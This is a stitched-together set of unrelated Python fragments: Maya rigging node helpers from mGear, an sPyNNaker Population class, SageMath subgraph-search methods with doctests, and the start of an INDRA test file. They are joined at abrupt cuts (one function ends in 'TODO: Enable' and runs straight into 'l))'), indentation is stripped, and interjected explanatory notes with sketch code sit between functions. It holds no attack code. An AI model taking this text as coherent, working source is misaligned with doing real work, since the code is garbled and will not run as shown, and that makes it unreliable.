mB (matrix): input matrix B.
target (dagNode): object target to apply the transformation
transform (str): if target is True. out transform to SRT valid
value s r t
Returns:
pyNode: Newly created mGear_multMatrix node
"""
node = pm.createNode("multMatrix")
for m, mi in zip([mA, mB], ['matrixIn[0]', 'matrixIn[1]']):
if isinstance(m, datatypes.Matrix):
pm.setAttr(node.attr(mi), m)
else:
pm.connectAttr(m, node.attr(mi))
if target:
dm_node = pm.createNode("decomposeMatrix")
pm.connectAttr(node + ".matrixSum",
dm_node + ".inputMatrix")
if 't' in transform:
pm.connectAttr(dm_node + ".outputTranslate",
target.attr("translate"), f=True)
if 'r' in transform:
pm.connectAttr(dm_node + ".outputRotate",
target.attr("rotate"), f=True)
if 's' in transform:
pm.connectAttr(dm_node + ".outputScale",
target.attr("scale"), f=True)
return node
def createDecomposeMatrixNode(m):
"""
Create and connect a decomposeMatrix node.
Arguments:
m(str or attr): The matrix attribute name.
Returns:
pyNode: the newly created node.
>>> dm_node = nod.createDecomposeMatrixNode(mulmat_node+".output")
"""
node = pm.createNode("decomposeMatrix")
pm.connectAttr(m, node + ".inputMatrix")
return node
def createDistNode(objA, objB, output=None):
"""Create and connect a distance node.
Arguments:
objA (dagNode): The dagNode A.
objB (dagNode): The dagNode B.
output (attr): Output attribute.
Returns:
pyNode: the newly created node.
>>> distA_node = nod.createDistNode(self.tws0_loc, self.tws1_loc)
"""
node = pm.createNode("distanceBetween")
dm_nodeA = pm.createNode("decomposeMatrix")
dm_nodeB = pm.createNode("decomposeMatrix")
pm.connectAttr(objA + ".worldMatrix", dm_nodeA + ".inputMatrix")
pm.connectAttr(objB + ".worldMatrix", dm_nodeB + ".inputMatrix")
pm.connectAttr(dm_nodeA + ".outputTranslate", node + ".point1")
pm.connectAttr(dm_nodeB + ".outputTranslate", node + ".point2")
if output:
pm.connectAttr(node + ".distance", output)
return node
def createConditionNode(firstTerm=False,
secondTerm=False,
operator=0,
ifTrue=False,
ifFalse=False):
"""Create and connect a condition node.
======== ======
operator index
======== ======
== 0
!= 1
> 2
>= 3
< 4
<= 5
======== ======
Arguments:
firstTerm (attr): The attribute string name for the first
conditions.
secondTerm (attr): The attribute string for the second
conditions.
operator (int): The operator to make the condition.
ifTrue (bool or attr): If an attribute is provided will connect
ifTrue output.
ifFalse (bool or attr): If an attribute is provided will connect
ifFalse output.
Returns:
pyNode: the newly created node.
>>> cond1_node = nod.createConditionNode(self.soft_attr,
0,
2,
subtract3_node+".output1D",
plusTotalLength_node+".output1D")
"""
check_list = (pm.Attribute, unicode, str)
node = pm.createNode("condition")
pm.setAttr(node + ".operation", operator)
if firstTerm:
attribute.connectSet(firstTerm, node + ".firstTerm", check_list)
if secondTerm:
attribute.connectSet(secondTerm, node + ".secondTerm", check_list)
if ifTrue:
attribute.connectSet(ifTrue, node + ".colorIfTrueR", check_list)
if ifFalse:
attribute.connectSet(ifFalse, node + ".colorIfFalseR", check_list)
return node
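The operator/index table in the docstring above maps comparison symbols to the condition node's `operation` values; as a plain mapping (a convenience sketch, not part of the mGear API):

```python
# Comparison symbol -> Maya condition-node 'operation' index,
# per the table in createConditionNode's docstring.
CONDITION_OPERATORS = {"==": 0, "!=": 1, ">": 2, ">=": 3, "<": 4, "<=": 5}

print(CONDITION_OPERATORS[">="])  # 3
```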
def createBlendNode(inputA, inputB, blender=.5):
"""Create and connect a createBlendNode node.
Arguments:
inputA (attr or list of 3 attr): The attribute input A
inputB (attr or list of 3 attr): The attribute input B
blender (float or attr): Float in 0 to 1 range or attribute
string name.
Returns:
pyNode: the newly created node.
>>> blend_node = nod.createBlendNode(
[dm_node+".outputRotate%s"%s for s in "XYZ"],
[cns+".rotate%s"%s for s in "XYZ"],
self.lock_ori_att)
"""
node = pm.createNode("blendColors")
if not isinstance(inputA, list):
inputA = [inputA]
if not isinstance(inputB, list):
inputB = [inputB]
for item, s in zip(inputA, "RGB"):
if (isinstance(item, str)
or isinstance(item, unicode)
or isinstance(item, pm.Attribute)):
pm.connectAttr(item, node + ".color1" + s)
else:
pm.setAttr(node + ".color1" + s, item)
for item, s in zip(inputB, "RGB"):
if (isinstance(item, str)
or isinstance(item, unicode)
or isinstance(item, pm.Attribute)):
pm.connectAttr(item, node + ".color2" + s)
else:
pm.setAttr(node + ".color2" + s, item)
if (isinstance(blender, str)
or isinstance(blender, unicode)
or isinstance(blender, pm.Attribute)):
pm.connectAttr(blender, node + ".blender")
else:
pm.setAttr(node + ".blender", blender)
return node
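What the blendColors node computes per channel is a linear interpolation: `blender=1` yields color1 and `blender=0` yields color2. A pure-Python sketch of that formula (not runnable Maya code):

```python
def blend_colors(color1, color2, blender):
    """Per-channel lerp matching Maya's blendColors: c1*b + c2*(1 - b)."""
    return tuple(a * blender + b * (1.0 - blender) for a, b in zip(color1, color2))

print(blend_colors((1.0, 0.0, 0.0), (0.0, 1.0, 0.0), 0.5))  # (0.5, 0.5, 0.0)
```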
def createPairBlend(inputA=None,
inputB=None,
blender=.5,
rotInterpolation=0,
output=None,
trans=True,
rot=True):
"""Create and connect a PairBlend node.
Arguments:
        inputA (dagNode): The transform input 1
        inputB (dagNode): The transform input 2
blender (float or attr): Float in 0 to 1 range or attribute
string name.
rotInterpolation (int): Rotation interpolation option. 0=Euler.
1=Quaternion.
        output (dagNode): The output node with the blend transform
            applied.
trans (bool): If true connects translation.
rot (bool): If true connects rotation.
Returns:
pyNode: the newly created node.
Example:
.. code-block:: python
blend_node = nod.createPairBlend(self.legBonesFK[i],
self.legBonesIK[i],
self.blend_att,
1)
pm.connectAttr(blend_node + ".outRotate", x+".rotate")
pm.connectAttr(blend_node + ".outTranslate", x+".translate")
"""
node = pm.createNode("pairBlend")
node.attr("rotInterpolation").set(rotInterpolation)
if inputA:
if trans:
pm.connectAttr(inputA + ".translate", node + ".inTranslate1")
if rot:
pm.connectAttr(inputA + ".rotate", node + ".inRotate1")
if inputB:
if trans:
pm.connectAttr(inputB + ".translate", node + ".inTranslate2")
if rot:
pm.connectAttr(inputB + ".rotate", node + ".inRotate2")
if (isinstance(blender, str)
or isinstance(blender, unicode)
or isinstance(blender, pm.Attribute)):
pm.connectAttr(blender, node + ".weight")
else:
pm.setAttr(node + ".weight", blender)
if output:
if rot:
pm.connectAttr(node + ".outRotate", output + ".rotate")
if trans:
pm.connectAttr(node + ".outTranslate", output + ".translate")
return node
def createSetRangeNode(input,
oldMin,
oldMax,
newMin=0,
newMax=1,
output=None,
name="setRange"):
"""Create Set Range Node"""
node = pm.createNode("setRange", n=name)
if not isinstance(input, list):
input = [input]
for item, s in zip(input, "XYZ"):
if (isinstance(item, str)
or isinstance(item, unicode)
or isinstance(item, pm.Attribute)):
pm.connectAttr(item, node + ".value" + s)
else:
pm.setAttr(node + ".value" + s, item)
if (isinstance(oldMin, str)
or isinstance(oldMin, unicode)
or isinstance(oldMin, pm.Attribute)):
pm.connectAttr(oldMin, node + ".oldMin" + s)
else:
pm.setAttr(node + ".oldMin" + s, oldMin)
if (isinstance(oldMax, str)
or isinstance(oldMax, unicode)
or isinstance(oldMax, pm.Attribute)):
pm.connectAttr(oldMax, node + ".oldMax" + s)
else:
pm.setAttr(node + ".oldMax" + s, oldMax)
if (isinstance(newMin, str)
or isinstance(newMin, unicode)
or isinstance(newMin, pm.Attribute)):
pm.connectAttr(newMin, node + ".min" + s)
else:
pm.setAttr(node + ".min" + s, newMin)
if (isinstance(newMax, str)
or isinstance(newMax, unicode)
or isinstance(newMax, pm.Attribute)):
pm.connectAttr(newMax, node + ".max" + s)
else:
pm.setAttr(node + ".max" + s, newMax)
if output:
if not isinstance(output, list):
output = [output]
for out, s in zip(output, "XYZ"):
pm.connectAttr(node + ".outValue" + s, out, f=True)
return node
def createReverseNode(input, output=None):
"""Create and connect a reverse node.
Arguments:
input (attr or list of 3 attr): The attribute input.
output (attr or list of 3 attr): The attribute to connect the
output.
Returns:
pyNode: the newly created node.
>>> fkvis_node = nod.createReverseNode(self.blend_att)
"""
node = pm.createNode("reverse")
if not isinstance(input, list):
input = [input]
for item, s in zip(input, "XYZ"):
if (isinstance(item, str)
or isinstance(item, unicode)
or isinstance(item, pm.Attribute)):
pm.connectAttr(item, node + ".input" + s)
else:
pm.setAttr(node + ".input" + s, item)
if output:
if not isinstance(output, list):
output = [output]
for out, s in zip(output, "XYZ"):
pm.connectAttr(node + ".output" + s, out, f=True)
return node
def createCurveInfoNode(crv):
"""Create and connect a curveInfo node.
Arguments:
crv (dagNode): The curve.
Returns:
pyNode: the newly created node.
>>> crv_node = nod.createCurveInfoNode(self.slv_crv)
"""
node = pm.createNode("curveInfo")
shape = pm.listRelatives(crv, shapes=True)[0]
pm.connectAttr(shape + ".local", node + ".inputCurve")
return node
# TODO: update using plusMinusAverage node
def createAddNode(inputA, inputB):
"""Create and connect a addition node.
Arguments:
inputA (attr or float): The attribute input A
inputB (attr or float): The attribute input B
Returns:
pyNode: the newly created node.
>>> add_node = nod.createAddNode(self.roundness_att, .001)
"""
node = pm.createNode("addDoubleLinear")
if (isinstance(inputA, str)
or isinstance(inputA, unicode)
or isinstance(inputA, pm.Attribute)):
pm.connectAttr(inputA, node + ".input1")
else:
pm.setAttr(node + ".input1", inputA)
if (isinstance(inputB, str)
or isinstance(inputB, unicode)
or isinstance(inputB, pm.Attribute)):
pm.connectAttr(inputB, node + ".input2")
else:
pm.setAttr(node + ".input2", inputB)
return node
# TODO: update using plusMinusAverage node
def createSubNode(inputA, inputB):
"""Create and connect a subtraction node.
Arguments:
inputA (attr or float): The attribute input A
inputB (attr or float): The attribute input B
Returns:
pyNode: the newly created node.
>>> sub_nod = nod.createSubNode(self.roll_att, angle_outputs[i-1])
"""
node = pm.createNode("addDoubleLinear")
if (isinstance(inputA, str)
or isinstance(inputA, unicode)
or isinstance(inputA, pm.Attribute)):
pm.connectAttr(inputA, node + ".input1")
else:
pm.setAttr(node + ".input1", inputA)
if (isinstance(inputB, str)
or isinstance(inputB, unicode)
or isinstance(inputB, pm.Attribute)):
neg_node = pm.createNode("multiplyDivide")
pm.connectAttr(inputB, neg_node + ".input1X")
pm.setAttr(neg_node + ".input2X", -1)
pm.connectAttr(neg_node + ".outputX", node + ".input2")
else:
pm.setAttr(node + ".input2", -inputB)
return node
def createPowNode(inputA, inputB, output=None):
"""Create and connect a power node.
Arguments:
inputA (attr, float or list of float): The attribute input A
inputB (attr, float or list of float): The attribute input B
output (attr or list of attr): The attribute to connect the
output.
Returns:
pyNode: the newly created node.
"""
return createMulDivNode(inputA, inputB, 3, output)
def createMulNode(inputA, inputB, output=None):
"""Create and connect a Multiply node.
Arguments:
| |
from pacman.model.constraints.abstract_constraints.abstract_constraint\
import AbstractConstraint
from pacman.model.constraints.placer_constraints\
.placer_chip_and_core_constraint import PlacerChipAndCoreConstraint
from spynnaker.pyNN.utilities import utility_calls
from spynnaker.pyNN.models.abstract_models.abstract_population_settable \
import AbstractPopulationSettable
from spynnaker.pyNN.models.abstract_models.abstract_population_initializable\
import AbstractPopulationInitializable
from spynnaker.pyNN.models.neuron.input_types.input_type_conductance \
import InputTypeConductance
from spynnaker.pyNN.models.common.abstract_spike_recordable \
import AbstractSpikeRecordable
from spynnaker.pyNN.models.common.abstract_gsyn_recordable \
import AbstractGSynRecordable
from spynnaker.pyNN.models.common.abstract_v_recordable \
import AbstractVRecordable
from spinn_front_end_common.utilities import exceptions
from spinn_front_end_common.abstract_models.abstract_changable_after_run \
import AbstractChangableAfterRun
import numpy
import logging
logger = logging.getLogger(__name__)
class Population(object):
    """ A collection of neurons of the same type. It encapsulates a type of\
vertex used with Spiking Neural Networks, comprising n cells (atoms)\
of the same model type.
:param int size:
size (number of cells) of the Population.
:param cellclass:
specifies the neural model to use for the Population
:param dict cellparams:
a dictionary containing model specific parameters and values
:param structure:
a spatial structure
:param string label:
a label identifying the Population
    :returns: a list of vertices and edges
"""
def __init__(self, size, cellclass, cellparams, spinnaker, label,
structure=None):
if size is not None and size <= 0:
raise exceptions.ConfigurationException(
"A population cannot have a negative or zero size.")
# Create a partitionable_graph vertex for the population and add it
# to PACMAN
cell_label = label
if label is None:
cell_label = "Population {}".format(
spinnaker.none_labelled_vertex_count)
spinnaker.increment_none_labelled_vertex_count()
# copy the parameters so that the end users are not exposed to the
# additions placed by spinnaker.
internal_cellparams = dict(cellparams)
# set spinnaker targeted parameters
internal_cellparams['label'] = cell_label
internal_cellparams['n_neurons'] = size
internal_cellparams['machine_time_step'] = spinnaker.machine_time_step
internal_cellparams['timescale_factor'] = spinnaker.timescale_factor
# create population vertex.
self._vertex = cellclass(**internal_cellparams)
self._spinnaker = spinnaker
self._delay_vertex = None
# Internal structure now supported 23 November 2014 ADR
# structure should be a valid Space.py structure type.
# generation of positions is deferred until needed.
if structure:
self._structure = structure
self._positions = None
else:
self._structure = None
self._spinnaker._add_population(self)
self._spinnaker.add_partitionable_vertex(self._vertex)
# initialise common stuff
self._size = size
self._record_spike_file = None
self._record_v_file = None
self._record_gsyn_file = None
# parameter
self._change_requires_mapping = True
@property
def requires_mapping(self):
if isinstance(self._vertex, AbstractChangableAfterRun):
return self._vertex.requires_mapping
return self._change_requires_mapping
def mark_no_changes(self):
self._change_requires_mapping = False
if isinstance(self._vertex, AbstractChangableAfterRun):
self._vertex.mark_no_changes()
def __add__(self, other):
""" Merges populations
"""
# TODO: Make this add the neurons from another population to this one
raise NotImplementedError
def all(self):
""" Iterator over cell ids on all nodes.
"""
# TODO: Return the cells when we have such a thing
raise NotImplementedError
@property
def conductance_based(self):
""" True if the population uses conductance inputs
"""
return isinstance(self._vertex.input_type, InputTypeConductance)
@property
def default_parameters(self):
""" The default parameters of the vertex from this population
:return:
"""
return self._vertex.default_parameters
def describe(self, template='population_default.txt', engine='default'):
""" Returns a human-readable description of the population.
The output may be customised by specifying a different template
together with an associated template engine (see ``pyNN.descriptions``)
If template is None, then a dictionary containing the template context
will be returned.
"""
# TODO:
raise NotImplementedError
def __getitem__(self, index_or_slice):
# TODO: Used to get a single cell - not yet supported
raise NotImplementedError
def get(self, parameter_name, gather=False):
""" Get the values of a parameter for every local cell in the\
population.
"""
if isinstance(self._vertex, AbstractPopulationSettable):
return self._vertex.get_value(parameter_name)
raise KeyError("Population does not have a property {}".format(
parameter_name))
# noinspection PyPep8Naming
def getSpikes(self, compatible_output=False, gather=True):
"""
Return a 2-column numpy array containing cell ids and spike times for\
recorded cells.
"""
if not gather:
            logger.warn("Spynnaker only supports gather=True; will"
                        " execute as if gather were True anyway")
if isinstance(self._vertex, AbstractSpikeRecordable):
if not self._vertex.is_recording_spikes():
raise exceptions.ConfigurationException(
"This population has not been set to record spikes")
else:
raise exceptions.ConfigurationException(
"This population has not got the capability to record spikes")
if not self._spinnaker.has_ran:
logger.warn(
"The simulation has not yet run, therefore spikes cannot"
" be retrieved, hence the list will be empty")
return numpy.zeros((0, 2))
if self._spinnaker.use_virtual_board:
logger.warn(
"The simulation is using a virtual machine and so has not"
                " truly run, hence the list will be empty")
return numpy.zeros((0, 2))
spikes = self._vertex.get_spikes(
self._spinnaker.placements, self._spinnaker.graph_mapper,
self._spinnaker.buffer_manager)
return spikes
def get_spike_counts(self, gather=True):
""" Return the number of spikes for each neuron.
"""
spikes = self.getSpikes(True, gather)
n_spikes = {}
counts = numpy.bincount(spikes[:, 0].astype(dtype="uint32"),
minlength=self._vertex.n_atoms)
for i in range(self._vertex.n_atoms):
n_spikes[i] = counts[i]
return n_spikes
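The per-neuron tally above (built with `numpy.bincount`) can be sketched with the stdlib instead; note every neuron gets an entry even if it never spiked:

```python
from collections import Counter

def spike_counts(spikes, n_atoms):
    """Count spikes per neuron from (neuron_id, time) pairs, like
    get_spike_counts but using collections.Counter instead of numpy."""
    counts = Counter(neuron_id for neuron_id, _time in spikes)
    return {i: counts.get(i, 0) for i in range(n_atoms)}

print(spike_counts([(0, 1.0), (1, 2.0), (0, 3.5)], n_atoms=3))
# {0: 2, 1: 1, 2: 0}
```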
# noinspection PyUnusedLocal
def get_gsyn(self, gather=True, compatible_output=False):
"""
Return a 3-column numpy array containing cell ids, time and synaptic
conductances for recorded cells.
:param gather:
not used - inserted to match PyNN specs
:type gather: bool
:param compatible_output:
not used - inserted to match PyNN specs
:type compatible_output: bool
"""
if isinstance(self._vertex, AbstractGSynRecordable):
if not self._vertex.is_recording_gsyn():
raise exceptions.ConfigurationException(
"This population has not been set to record gsyn")
else:
raise exceptions.ConfigurationException(
"This population has not got the capability to record gsyn")
if not self._spinnaker.has_ran:
logger.warn(
"The simulation has not yet run, therefore gsyn cannot"
" be retrieved, hence the list will be empty")
return numpy.zeros((0, 4))
if self._spinnaker.use_virtual_board:
logger.warn(
"The simulation is using a virtual machine and so has not"
" truly ran, hence the list will be empty")
return numpy.zeros((0, 4))
return self._vertex.get_gsyn(
self._spinnaker.no_machine_time_steps, self._spinnaker.placements,
self._spinnaker.graph_mapper, self._spinnaker.buffer_manager)
# noinspection PyUnusedLocal
def get_v(self, gather=True, compatible_output=False):
"""
Return a 3-column numpy array containing cell ids, time, and V_m for
recorded cells.
:param gather:
not used - inserted to match PyNN specs
:type gather: bool
:param compatible_output:
not used - inserted to match PyNN specs
:type compatible_output: bool
"""
if isinstance(self._vertex, AbstractVRecordable):
if not self._vertex.is_recording_v():
raise exceptions.ConfigurationException(
"This population has not been set to record v")
else:
raise exceptions.ConfigurationException(
"This population has not got the capability to record v")
if not self._spinnaker.has_ran:
logger.warn(
"The simulation has not yet run, therefore v cannot"
" be retrieved, hence the list will be empty")
return numpy.zeros((0, 3))
if self._spinnaker.use_virtual_board:
logger.warn(
"The simulation is using a virtual machine and so has not"
" truly ran, hence the list will be empty")
return numpy.zeros((0, 3))
return self._vertex.get_v(
self._spinnaker.no_machine_time_steps, self._spinnaker.placements,
self._spinnaker.graph_mapper, self._spinnaker.buffer_manager)
def id_to_index(self, cell_id):
""" Given the ID(s) of cell(s) in the Population, return its (their)\
index (order in the Population).
"""
# TODO: Need __getitem__
raise NotImplementedError
def id_to_local_index(self, cell_id):
""" Given the ID(s) of cell(s) in the Population, return its (their)\
index (order in the Population), counting only cells on the local\
MPI node.
"""
# TODO: Need __getitem__
raise NotImplementedError
def initialize(self, variable, value):
""" Set the initial value of one of the state variables of the neurons\
in this population.
"""
if not isinstance(self._vertex, AbstractPopulationInitializable):
raise KeyError(
"Population does not support the initialisation of {}".format(
variable))
self._vertex.initialize(variable, utility_calls.convert_param_to_numpy(
value, self._vertex.n_atoms))
self._change_requires_mapping = True
@staticmethod
def is_local(cell_id):
""" Determine whether the cell with the given ID exists on the local \
MPI node.
:param cell_id:
"""
# Doesn't really mean anything on SpiNNaker
return True
def can_record(self, variable):
""" Determine whether `variable` can be recorded from this population.
"""
# TODO: Needs a more precise recording mechanism (coming soon)
raise NotImplementedError
def inject(self, current_source):
""" Connect a current source to all cells in the Population.
"""
# TODO:
raise NotImplementedError
def __iter__(self):
""" Iterate over local cells
"""
# TODO:
raise NotImplementedError
def __len__(self):
""" Get the total number of cells in the population.
"""
return self._size
@property
def label(self):
""" The label of the population
"""
return self._vertex.label
@property
def local_size(self):
""" The number of local cells
"""
# Doesn't make much sense on SpiNNaker
return self._size
# noinspection PyPep8Naming
def meanSpikeCount(self, gather=True):
""" The mean number of spikes per neuron
:param gather: gather has no meaning in spinnaker, always set to true
:return: an array which contains the average spike rate per neuron
"""
return self.mean_spike_count(gather)
def mean_spike_count(self, gather=True):
""" The mean number of spikes per neuron
"""
spike_counts = self.get_spike_counts(gather)
total_spikes = sum(spike_counts.values())
return total_spikes / self._size
def nearest(self, position):
""" Return the neuron closest to the specified position
"""
# doesn't always work correctly if a position is equidistant between
# two neurons, i.e. 0.5 should be rounded up, but it isn't always.
# also doesn't take account of periodic boundary conditions
# TODO: Enable
l))
if edge_property is not None:
# We might get duplicate edges, but this does handle the case of
# multiple edges.
edges_to_delete.extend(e for e in G.edge_iterator() if not edge_property(e))
G.delete_edges(edges_to_delete)
if not inplace:
if immutable is None:
immutable = self.is_immutable()
if immutable:
G = G.copy(immutable=True)
return G
def subgraph_search(self, G, induced=False):
r"""
Return a copy of ``G`` in ``self``.
INPUT:
- ``G`` -- the (di)graph whose copy we are looking for in ``self``
- ``induced`` -- boolean (default: ``False``); whether or not to search
for an induced copy of ``G`` in ``self``
OUTPUT:
If ``induced=False``, return a copy of ``G`` in this graph. Otherwise,
return an induced copy of ``G`` in ``self``. If ``G`` is the empty
graph, return the empty graph since it is a subgraph of every graph. Now
suppose ``G`` is not the empty graph. If there is no copy (induced or
otherwise) of ``G`` in ``self``, we return ``None``.
.. NOTE::
The vertex labels and the edge labels in the graph are ignored.
.. SEEALSO::
- :meth:`~GenericGraph.subgraph_search_count` -- counts the number
of copies of `H` inside of `G`
- :meth:`~GenericGraph.subgraph_search_iterator` -- iterator over
the copies of `H` inside of `G`
ALGORITHM:
See the documentation of
:class:`~sage.graphs.generic_graph_pyx.SubgraphSearch`.
EXAMPLES:
The Petersen graph contains the path graph `P_5`::
sage: g = graphs.PetersenGraph()
sage: h1 = g.subgraph_search(graphs.PathGraph(5)); h1
Subgraph of (Petersen graph): Graph on 5 vertices
sage: h1.vertices(); h1.edges(labels=False)
[0, 1, 2, 3, 4]
[(0, 1), (1, 2), (2, 3), (3, 4)]
sage: I1 = g.subgraph_search(graphs.PathGraph(5), induced=True); I1
Subgraph of (Petersen graph): Graph on 5 vertices
sage: I1.vertices(); I1.edges(labels=False)
[0, 1, 2, 3, 8]
[(0, 1), (1, 2), (2, 3), (3, 8)]
It also contains the claw `K_{1,3}`::
sage: h2 = g.subgraph_search(graphs.ClawGraph()); h2
Subgraph of (Petersen graph): Graph on 4 vertices
sage: h2.vertices(); h2.edges(labels=False)
[0, 1, 4, 5]
[(0, 1), (0, 4), (0, 5)]
sage: I2 = g.subgraph_search(graphs.ClawGraph(), induced=True); I2
Subgraph of (Petersen graph): Graph on 4 vertices
sage: I2.vertices(); I2.edges(labels=False)
[0, 1, 4, 5]
[(0, 1), (0, 4), (0, 5)]
Of course the induced copies are isomorphic to the graphs we were
looking for::
sage: I1.is_isomorphic(graphs.PathGraph(5))
True
sage: I2.is_isomorphic(graphs.ClawGraph())
True
However, the Petersen graph does not contain a subgraph isomorphic to
`K_3`::
sage: g.subgraph_search(graphs.CompleteGraph(3)) is None
True
Nor does it contain a nonempty induced subgraph isomorphic to `P_6`::
sage: g.subgraph_search(graphs.PathGraph(6), induced=True) is None
True
The empty graph is a subgraph of every graph::
sage: g.subgraph_search(graphs.EmptyGraph())
Graph on 0 vertices
sage: g.subgraph_search(graphs.EmptyGraph(), induced=True)
Graph on 0 vertices
The subgraph may just have edges missing::
sage: k3 = graphs.CompleteGraph(3); p3 = graphs.PathGraph(3)
sage: k3.relabel(list('abc'))
sage: s = k3.subgraph_search(p3)
sage: s.edges(labels=False)
[('a', 'b'), ('b', 'c')]
Of course, `P_3` is not an induced subgraph of `K_3`, though::
sage: k3 = graphs.CompleteGraph(3); p3 = graphs.PathGraph(3)
sage: k3.relabel(list('abc'))
sage: k3.subgraph_search(p3, induced=True) is None
True
If the graph has labels, the labels are just ignored::
sage: g.set_vertex(0, 'foo')
sage: c = g.subgraph_search(graphs.PathGraph(5))
sage: c.get_vertices()
{0: 'foo', 1: None, 2: None, 3: None, 4: None}
TESTS:
Inside of a small graph (:trac:`13906`)::
sage: Graph(5).subgraph_search(Graph(1))
Graph on 1 vertex
For labelled edges (:trac:`14999`)::
sage: G = graphs.CompleteGraph(10)
sage: C = G.subgraph_search(graphs.CycleGraph(4))
sage: C.size()
4
sage: C.edges()
[(0, 1, None), (0, 3, None), (1, 2, None), (2, 3, None)]
sage: for (u,v) in G.edges(labels=False):
....: G.set_edge_label(u, v, u)
sage: C = G.subgraph_search(graphs.CycleGraph(4))
sage: C.edges()
[(0, 1, 0), (0, 3, 0), (1, 2, 1), (2, 3, 2)]
"""
from sage.graphs.generic_graph_pyx import SubgraphSearch
from sage.graphs.graph_generators import GraphGenerators
if not G.order():
return GraphGenerators().EmptyGraph()
# SubgraphSearch assumes the graph we are searching for has order at least 2.
if G.order() == 1:
if self.order() >= 1:
from sage.graphs.graph import Graph
return Graph({next(self.vertex_iterator()): []})
else:
return None
S = SubgraphSearch(self, G, induced=induced)
for g in S:
if induced:
return self.subgraph(g)
else:
Gcopy = copy(G)
Gcopy.relabel(g)
return self.subgraph(vertices=Gcopy, edges=Gcopy.edges(labels=False, sort=False))
return None
def subgraph_search_count(self, G, induced=False):
r"""
Return the number of labelled occurrences of ``G`` in ``self``.
INPUT:
- ``G`` -- the (di)graph whose copies we are looking for in ``self``
- ``induced`` -- boolean (default: ``False``); whether or not to count
induced copies of ``G`` in ``self``
.. NOTE::
The vertex labels and the edge labels in the graph are ignored.
ALGORITHM:
See the documentation of
:class:`~sage.graphs.generic_graph_pyx.SubgraphSearch`.
.. SEEALSO::
- :meth:`~GenericGraph.subgraph_search` -- finds a subgraph
isomorphic to `H` inside of a graph `G`
- :meth:`~GenericGraph.subgraph_search_iterator` -- iterator over
the copies of a graph `H` inside of a graph `G`
EXAMPLES:
Counting the number of paths `P_5` in a PetersenGraph::
sage: g = graphs.PetersenGraph()
sage: g.subgraph_search_count(graphs.PathGraph(5))
240
Requiring these subgraphs be induced::
sage: g.subgraph_search_count(graphs.PathGraph(5), induced=True)
120
If we define the graph `T_k` (the transitive tournament on `k` vertices)
as the graph on `\{0, ..., k-1\}` such that `ij \in T_k` if `i<j`, how
many directed triangles can be found in `T_5` ? The answer is of course
`0`::
sage: T5 = digraphs.TransitiveTournament(5)
sage: T5.subgraph_search_count(digraphs.Circuit(3))
0
If we count instead the number of `T_3` in `T_5`, we expect
the answer to be `\binom{5}{3}`::
sage: T3 = digraphs.TransitiveTournament(3)
sage: T5.subgraph_search_count(T3)
10
sage: binomial(5,3)
10
sage: T3.is_isomorphic(T5.subgraph(vertices=[0, 1, 2]))
True
The empty graph is a subgraph of every graph::
sage: g.subgraph_search_count(graphs.EmptyGraph())
1
If the graph has vertex labels or edge labels, the label is just ignored::
sage: g.set_vertex(0, 'foo')
sage: g.subgraph_search_count(graphs.PathGraph(5))
240
TESTS:
Inside of a small graph (:trac:`13906`)::
sage: Graph(5).subgraph_search_count(Graph(1))
5
"""
from sage.graphs.generic_graph_pyx import SubgraphSearch
if not G.order():
return 1
if not self.order():
return 0
if G.order() == 1:
return self.order()
S = SubgraphSearch(self, G, induced=induced)
return S.cardinality()
def subgraph_search_iterator(self, G, induced=False):
r"""
Return an iterator over the labelled copies of ``G`` in ``self``.
INPUT:
- ``G`` -- the graph whose copies we are looking for in ``self``
- ``induced`` -- boolean (default: ``False``); whether or not to iterate
over the induced copies of ``G`` in ``self``
.. NOTE::
The vertex labels and the edge labels in the graph are ignored.
ALGORITHM:
See the documentation of
:class:`~sage.graphs.generic_graph_pyx.SubgraphSearch`.
OUTPUT:
Iterator over the labelled copies of ``G`` in ``self``, as *lists*. For
each value `(v_1, v_2, ..., v_k)` returned, the first vertex of `G` is
associated with `v_1`, the second with `v_2`, etc.
.. NOTE::
This method also works on digraphs.
.. SEEALSO::
- :meth:`~GenericGraph.subgraph_search` -- finds a subgraph
isomorphic to `H` inside of `G`
- :meth:`~GenericGraph.subgraph_search_count` -- counts the number
of copies of `H` inside of `G`
EXAMPLES:
Iterating through all the labelled `P_3` of `P_5`::
sage: g = graphs.PathGraph(5)
sage: for p in g.subgraph_search_iterator(graphs.PathGraph(3)):
....: print(p)
[0, 1, 2]
[1, 2, 3]
[2, 1, 0]
[2, 3, 4]
[3, 2, 1]
[4, 3, 2]
If the graph has vertex labels or edge labels, the label is just ignored::
sage: g.set_vertex(0, 'foo')
sage: for p in g.subgraph_search_iterator(graphs.PathGraph(3)):
....: print(p)
[0, 1, 2]
[1, 2, 3]
[2, 1, 0]
[2, 3, 4]
[3, 2, 1]
[4, 3, 2]
TESTS:
Inside of a small graph (:trac:`13906`)::
sage: list(Graph(5).subgraph_search_iterator(Graph(1)))
[Graph on 1 vertex, Graph on 1 vertex, Graph on 1 vertex, Graph on 1 vertex, Graph on 1 vertex]
"""
if not G.order():
from sage.graphs.graph_generators import GraphGenerators
return [GraphGenerators().EmptyGraph()]
elif not self.order():
return []
elif G.order() == 1:
from sage.graphs.graph import Graph
return iter([Graph({v: []}) for v in self])
else:
from sage.graphs.generic_graph_pyx import SubgraphSearch
return SubgraphSearch(self, G, induced=induced)
def random_subgraph(self, p, inplace=False):
"""
Return a random subgraph containing each vertex with probability ``p``.
INPUT:
- ``p`` -- the probability of choosing a vertex
- ``inplace`` -- boolean (default: ``False``); using ``inplace=True``
will simply delete the extra vertices and edges from the current
graph. This will modify the graph.
EXAMPLES::
sage: P = graphs.PetersenGraph()
sage: P.random_subgraph(.25)
Subgraph of (Petersen graph): Graph on ... vert...
"""
p = float(p)
if p < 0 or p > 1:
raise ValueError("a probability must be in range [0..1]")
vertices = [v for v in
# indra/tests/test_belief_sklearn.py
import random
import pickle
import numpy as np
from copy import copy
from collections import defaultdict
from os.path import join, abspath, dirname
from nose.tools import raises
from sklearn.linear_model import LogisticRegression
from indra.sources import signor
from indra.belief import BeliefEngine
from indra.tools import assemble_corpus as ac
from indra.statements import Evidence
from indra.belief.skl import CountsScorer
# A set of test statements derived from SIGNOR only
# (these include many different stmt types)
test_stmt_path = join(dirname(abspath(__file__)),
'belief_sklearn_test_stmts.pkl')
# An alternative set of test statements derived from the curated stmt dataset
# (these include supports/supported_by)
test_stmt_cur_path = join(dirname(abspath(__file__)),
'belief_sklearn_test_stmts_cur.pkl')
# A statement dataframe sample
test_df_path = join(dirname(abspath(__file__)),
'belief_sklearn_test_df.pkl')
with open(test_stmt_path, 'rb') as f:
test_stmts, y_arr_stmts = pickle.load(f)
